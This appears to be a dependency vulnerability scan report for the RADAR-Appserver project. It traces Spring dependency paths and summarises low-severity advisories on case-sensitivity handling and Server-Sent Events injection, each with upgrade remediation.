Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-actuator@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-jackson@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
Overview
Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to String.toLowerCase() having some Locale dependent exceptions that could potentially result in fields not protected as expected.
Note:
The fix for CVE-2022-22968 made disallowedFields patterns in DataBinder case insensitive.
This vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.
Remediation
Upgrade org.springframework:spring-context to version 6.1.14 or higher.
References
low severity
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-M4 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to String.toLowerCase() having some Locale dependent exceptions that could potentially result in fields not protected as expected.
Note:
The fix for CVE-2022-22968 made disallowedFields patterns in DataBinder case insensitive.
This vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.
Remediation
Upgrade org.springframework:spring-web to version 6.1.14 or higher.
References
low severity
new
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-M4 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'). The vulnerability exists in the handling of Server-Sent Events (SSE) when streaming plain text data. An attacker can inject crafted data into the event stream, breaking message boundaries and corrupting the stream delivered to other clients. By controlling streamed content, an attacker can manipulate how subsequent events are parsed by the client, potentially altering application state or injecting misleading data.
Note:
This is only exploitable if the application streams attacker-controlled data via SSE using unstructured/plain-text messages instead of a structured format (e.g., JSON).
Remediation
Upgrade org.springframework:spring-web to version 6.2.17, 7.0.6 or higher.